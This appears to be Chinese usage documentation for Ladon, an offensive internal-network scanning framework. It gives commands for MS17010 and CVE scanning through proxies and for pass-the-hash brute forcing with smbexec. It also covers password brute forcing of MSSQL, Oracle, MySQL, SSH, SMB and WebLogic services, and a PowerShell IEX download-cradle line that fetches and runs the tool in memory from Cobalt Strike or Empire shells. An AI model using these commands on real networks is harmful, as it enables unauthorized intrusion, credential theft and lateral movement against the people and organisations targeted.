默认扫描会先通过icmp扫描主机是否存活,当使用工具转发内网
或者目标机器禁ping时,使用noping参数进行扫描,速度稍慢一点
Ladon noping
Ladon noping 192.168.1.8/24
Ladon noping 192.168.1.8/24 MS17010
详见:http://k8gege.org/Ladon/proxy.html
proxychains mono Ladon noping 192.168.1.8/24 MS17010
proxychains mono Ladon noping http://192.168.1.1 WhatCMS
推荐proxifier 3.42及以上版本,最好是最新版4.0.1
例子:扫描目标10.1.2段是否存在MS17010漏洞(必须加noping)
Ladon noping 10.1.2.8/24 MS17010
适用场景,需调用相关命令或第三方工具进行批量操作
或者有新的POC,但来不及或无法写成DLL来调用时
很多第3方工具不支持批量或者说根本不支持批量网段
而Ladon不只限于批量IP、URL、IP段、任意内容等
是紧急情况下最适合用于验证内网是否存在漏洞工具
新的漏洞来时你能调好POC就不错了,批量更要时间
ping.ini
[Ladon]
exe=cmd.exe
arg=/c ping $ip$
命令: Ladon ping.ini
命令: Ladon 192.168.1.8/24 ping.ini
[Ladon]
exe=F:\Python279\python.exe
arg=CVE-2019-11043-POC.py $ip$
例子: https://github.com/k8gege/CVE-2019-11043
例子:调用修改过的smbexec.exe进行HASH密码验证,原版不退出无法爆破
根目录下放4个文件,smbexec.exe、smbhash.ini、user.txt、pass.txt。
smbhash.ini
[Ladon]
exe=smbexec.exe
arg=-hashes $pass$ $user$@$ip$
isok=Launching semi-interactive shell
port=445
log=true
INI参数说明
isok:成功标志,必填项。如smbexec成功时返回”Launching semi-interactive shell”
port:对应端口,非必填。如SMB为445,Ladon先检测到端口开放,才进行密码爆破
log: 程序日志,非必填。如有些程序返回一堆错误结果,我们不想看,可不显示
检测内网C段是否使用同一个密码,命令:Ladon 192.168.1.1/24 smbhash.ini
详见:http://k8gege.org/p/53177.html
使用PortScan模块时,默认扫描常见高危漏洞端口
遇到修改了默认端口的,Ladon就无法扫描了吗?
使用port.txt
格式1:80,21,1433,3306,445
格式2:80-88,21-23,5800-5900
格式3:
21
23
80
格式4:
80-88
21-23
Ladon 192.168.1.8/24 PortScan 80-89
Ladon 192.168.1.8-192.168.1.200 PortScan 22,80,1433,21,3306,1521
1 支持标准的user.txt和pass.txt帐密破解,爆破每个用户都需将密码跑完或跑出正确为此
2 支持userpass.txt(存放用户名和对应密码),用于快速验证其它机器是否存在相同帐密
3 支持check.txt(存放IP/端口/库名/用户/密码),不指定端口和数据库名则使用默认
user.txt和pass.txt分别存放用户、密码
userpass.txt存放用户密码组,即每行存放用户以及密码
check.txt每行存放IP\端口\用户\密码
数据库与其它密码爆破不同,有时数据库做了权限,指定用户只能连指定库,连默认库肯定不行
(大型内网可能从其它机器收集到大量机器密码,第一步肯定是先验证)
非默认端口请将以下端口改成被修改端口即可,单个IP可直接Ladon IP:端口 MssqlScan扫描
check.txt
192.168.1.8 1433 master sa k8gege
192.168.1.8 sa k8gege
192.168.1.8 1433 sa k8gege
命令: Ladon MssqlScan
192.168.1.8 1521 orcl system k8gege
192.168.1.8 orcl system k8gege
192.168.1.8 system k8gege
命令: Ladon OracleScan
192.168.1.8 3306 root k8gege
192.168.1.8 root k8gege
命令: Ladon MysqlScan
check.txt
192.168.1.8 22 root k8gege
192.168.1.8 root k8gege
命令: Ladon SshScan
详细用法:http://k8gege.org/Ladon/sshscan.html
check.txt
192.168.1.8 admin k8gege
命令: Ladon WmiScan 或 Ladon SmbScan
check.txt
192.168.1.8 admin k8gege
命令: Ladon WmiScan 或 Ladon SmbScan
check.txt(url 用户 密码)
http://192.168.1.8:7001/console weblogic k8gege
命令: Ladon WeblogicScan
因Rar压缩包只需一个密码,故只需pass.txt,注意中文密码需将txt保存为Ansi编码
命令: Ladon test.rar RarScan
PowerLadon完美兼容win7-win10 PowerShell,对于不支持.net程序插件化的远控,可使用
PowerShell版,也可CMD命令行下远程加载内存实现无文件扫描,模块加载后用法和EXE一致。
适用于支持PowerShell交互远控或Shell,如Cobalt Strike
1 | > powershell |
适用于还没跟上时代的远控或Shell只支持CMD交互
1 | > powershell Import-Module .\Ladon.ps1;Ladon OnlinePC |
适用于还没跟上时代的远控或Shell只支持CMD交互
1 | > powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5:800/Ladon.ps1'); Ladon OnlinePC" |
Empire的shell有点问题,分号被截断,可以加个cmd /c
Ladon最初的设计就是一款扫描框架,为了方便才内置功能
毕竟需要使用一个功能就得在目标多上传一个文件是顶麻烦的
不像MSF框架和模块多大都无所谓,因为你只是在本地使用
为了让大家都可以自定义模块,Ladon插件支持多种编程语言
最菜可通过INI配置插件,了解HTTP可通过EXP生成器生成POC
懂得编程可使用C#、Delphi、VC编写DLL,PowerShell脚本
EXP生成器教程: https://github.com/k8gege/Ladon/wiki/LadonExp-Usage
实战例子: https://github.com/k8gege/Ladon/wiki/%E6%BC%8F%E6%B4%9E%E6%89%AB%E6%8F%8F-CVE-2018-2894
自定义模块教程: https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle
https://github.com/k8gege/Ladon/raw/master/MoudleDemo.rar
历史版本: https://github.com/k8gege/Ladon/releases
911版本:https://k8gege.org/Download
10.9版本:K8小密圈